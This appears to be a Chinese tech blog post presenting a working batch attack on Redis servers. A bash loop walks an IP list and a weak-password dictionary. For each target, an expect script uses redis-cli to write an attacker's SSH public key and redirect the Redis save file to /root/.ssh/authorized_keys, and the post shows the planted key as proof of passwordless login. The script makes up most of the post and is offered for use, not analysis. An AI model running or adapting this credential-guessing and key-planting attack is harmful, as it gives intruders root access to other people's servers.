2. 程式人生 > >shell指令碼實現批量自動redis反彈shell攻擊

shell指令碼實現批量自動redis反彈shell攻擊

阿新 發佈:2019-02-13

一、shell實現redis反彈shell

[[email protected] attack]# cat shell_rebound.sh
#!/bin/bash
##create by xingcheng
##20180403
##function 批量redis反彈shell獲取系統許可權,主要針對沒有安全策略的reids伺服器和弱口令redis伺服器,他們往往使用root賬戶執行

#ip_list=(39.106.107.229 123.206.31.161 127.0.0.1)
#password_dict=(123456 abcdef 234rdffs)
ip_list=(127.0.0.1
 
 192.168.0.1) #ip列表陣列,可以批量存入ip
password_dict=(123456 abcdefg 1qaz2wsx) #弱口令陣列




password(){
for passwd in ${password_dict[@]}
do
  expect shell_rebound.exp "$ip" "$passwd"
  echo $(cat /root/.ssh/authorized_keys)
done

}




ip(){
for ip in ${ip_list[@]}
do
  password
done
}

ip

[root@xingcheng attack]# cat shell_rebound.exp 
 

#!/usr/bin/expect

set sentence1 [lindex $argv 0]
set sentence2 [lindex $argv 1]
spawn /usr/local/redis/bin/redis-cli -h $sentence1 -p 6379 -a $sentence2

expect  "127.0.0.1:6379>"
if { $sentence1==$sentence1 } {
send "set -.- \"\n\n\nssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEAltEC9ktb+401+epwi/QxYKoTLYiHaJ9RREnHzPfMzs107ba9otiT6iiiFDJtXnvAWkp6vMDJ59ncJUNCFmPjReK521DP5cmVg5V7un71GhFEybZ8oGzEFWeYPhXp+vBK0VW1btPl7GaLs5DU1bKDpmPPFURWFIw77pd8CFeYXjLBssmQgvm3szk2VxD2gw2DAQa6+cLGtjRMmWgD2QRG7gkMoRotkfoxkqwESuBedspm0unB7eQHfXvMznntnwTzwDW1E70BMAvk4bnoJnBGnZep2SBxNUn9H6a7mcGyD6FDQ6TQClc9KeXNiq/mqTa0X6jCLzF0GsYl0mQHcAF7DQ== rsa-key-20180320\n\n\n\" \r"
 

send "config set dir /root/.ssh \r"
send "config set dbfilename authorized_keys \r"
send "save \r"
}


expect eof

成功的效果,免密碼登陸伺服器成功。

[root@xingcheng attack]# cat /root/.ssh/authorized_keys
REDIS0008   redis-ver4.0.6
redis-bits����e.used-mem¸þ

                        ��preamble~��-A 


ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEAltEC9ktb+401+epwi/QxYKoTLYiHaJ9RREnHzPfMzs107ba9otiT6iiiFDJtXnvAWkp6vMDJ59ncJUNCFmPjReK521DP5cmVg5V7un71GhFEybZ8oGzEFWeYPhXp+vBK0VW1btPl7GaLs5DU1bKDpmPPFURWFIw77pd8CFeYXjLBssmQgvm3szk2VxD2gw2DAQa6+cLGtjRMmWgD2QRG7gkMoRotkfoxkqwESuBedspm0unB7eQHfXvMznntnwTzwDW1E70BMAvk4bnoJnBGnZep2SBxNUn9H6a7mcGyD6FDQ6TQClc9KeXNiq/mqTa0X6jCLzF0GsYl0mQHcAF7DQ== rsa-key-20180320

相關推薦

shell指令碼實現批量自動redis反彈shell攻擊

一、shell實現redis反彈shell [[email protected] attack]# cat shell_rebound.sh #!/bin/bash ##create b

Linux下Shell指令碼實現批量重新命名資料夾,批量重新命名檔案(讓原本繁重的工作變得簡單)

最近接了個專案,具體做什麼都不說了,其中有個工作就是批量更改資料夾,然後批量更改資料夾下的檔名字,一會兒先貼程式碼,再詳細解釋步驟。 下面是我的簡化版的目錄結構,實際上有上百個。 project dir1 dir1.py dir2

[shell]shell指令碼實現每天自動抽取資料插入hive表

#!/bin/bash source /etc/profile source ~/.bashrc M_DATE=$(date -d'-1 day' +%m) #取系統日期前一天的月份 spark-sql -e" insert overwrite table db.t

Shell指令碼實現應用自動安裝部署

#!/bin/bash //設定指令碼中所需命令的執行路徑 PATH=/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin:~/bin export PATH // $? 是取得上面執行命令的返回值,一般正確為0,錯誤為1 if [ "

Dockerfile 構建前端node應用並用shell指令碼實現jenkins自動構建

cat Dockerfile.node.pre FROM centos MAINTAINER zhao*******h.cn ENV LANG en_US.UTF-8 RUN /bin/cp /usr/share/zoneinfo/Asia/Shanghai /etc/localtime &

Dockerfile 構建前端nginx應用並用shell指令碼實現jenkins自動構建

Dockerfile 檔案構建docker映象 FROM centos MAINTAINER zh********h.cn RUN rm -f /etc/nginx/nginx.conf COPY nginx.conf /etc/nginx/nginx.conf WORKDIR / RUN

shell指令碼實現mysql自動還原(linux)

#!/bin/bash #主機地址 host="localhost"   #mysql使用者名稱 id="root"       #mysql祕密        pwd="sanyue"dbs=$(echo "show databases;" | mysql -u$id -

ARM40-A5應用——Shell指令碼實現程序自動拉起

ARM40-A5應用——Shell指令碼實現程序自動拉起 2018.6.11        在Linux上許多程式是無法保證絕對穩定的,但必須要確保程式在出現小概率錯誤或者未知崩潰退出後,可以重新執行起來。 本文介紹一種基於shell指令碼的後臺程序來解決這種問題

Linux使用Shell指令碼實現FTP自動下載檔案,並記錄下載檔案日誌

Linux使用Shell指令碼實現FTP自動下載檔案,並記錄下載檔案日誌 最近初學shell程式設計,記一下自己寫的第一個指令

利用PHOTOSHOP CS 和 指令碼實現批量自動處理圖片

OptionExplicit''Batch converter  for Photoshop CS2(Not tested for CS1)'author: cangwu.lee # gmail.com'saving parameterConst psSaveChanges          =1Const 

利用Shell指令碼實現遠端MySQL自動查詢

下面這個指令碼是一個簡單用來執行遠端資料庫查詢的命令,相信大家都能看得懂,這對於有些需要每天自動檢查資料庫或是執行某些語句的兄弟,是很有幫助的,只要稍加修改就可以 #!/bin/shHOST=192.168.5.40USER=abcPASS=123456QUERY=`mysql -h$HOST -u$USE

ossutil命令上傳檔案到阿里雲oss詳解,使用Shell指令碼實現資料的自動上傳下載Bucket物件儲存

安裝ossutil yum -y install wget wget http://docs-aliyun.cn-hangzhou.oss.aliyun-inc.com/assets/attach/50452/cn_zh/1524643963683/ossutil64 mv

Shell指令碼實現軟體一鍵安裝和自動重啟(一)

前言 在LINUX開發過程中,往往需要對已經開發好的軟體進行打包,一鍵安裝後程序能自動後臺啟動,當程序意外關閉後能自動重啟,本篇來介紹實現過程。 業務分析 對功能進行拆分 1、實現程式後臺執行,掛掉重啟的監聽器指令碼 2、將監聽器指令碼放入開機啟動項 3、實現軟體

Hive(24):例項:hive shell指令碼實現自動載入資料

一、實現功能 日誌檔案需要按時自動上傳到hdfs、hive,然後,才可以進行下一步的ETL。所以,定時定點將日誌資訊按時上傳時非常重要的。 二、實現 1.hive中建立源表 create database load_hive; create table load_h

SHELL指令碼實現服務宕機監控自動重啟

需要先安裝 yum install stat  crontabs (本例項在centos系統下) #!/bin/bash #Shell ##根據修改檔案時間進行監控## content=`ls -l /tmp/log.txt | awk '{ print $5 }'`  

shell指令碼實現MBR、GPT自動分割槽及格式化

這是一個小指令碼: #!/bin/bash # #Author:samrtwy(qq:120649294) #Version:2.0 #Date:2017-04-23 #Descripton:According to the input partiti

初學乍練redis:兩行shell指令碼實現slowlog持久化轉儲(去重保留歷史條目、時間戳格式化)

目錄 一、問題提出         在排查redis效能問題時,從slowlog中找執行緩慢的命令進行優化是一種常規手段。redis slowlog被設計成記憶體中一個先進先出的佇列結構,一旦容量被填滿,新的條目就會擠出舊條目。特別是在慢日

linux使用shell指令碼實現自動登入scp傳輸檔案到其他伺服器

執行 sudo yum install expect  安裝自動登入expect工具 我們是配置了多臺伺服器進行控制多臺伺服器的檔案傳輸,使用scp命令進行copy檔案到指定伺服器的指定檔案目錄,一般複製到home目錄因為這個目錄對外有可執行許可權 下面我們看下會用到的檔

shell指令碼實現自動保留最近n次備份記錄

貼個廣告 樓主的部落格已全部搬遷至自己的部落格,感興趣的小夥伴請移步haifeiWu與他朋友們的部落格專欄 專案中出現的問題 某天上午伺服器出現卡頓特別嚴重,頁面載入速度奇慢,並且某些頁面刷新出現404的問題,就連伺服器的tab命令的自動提示都出現了問題,

shell指令碼實現自動生成檔案頭資訊用到的語法

/******************************************************** *Author: Goup * *Date: 2017-08-29 14:15 * *Description: cat >> "$1" <&l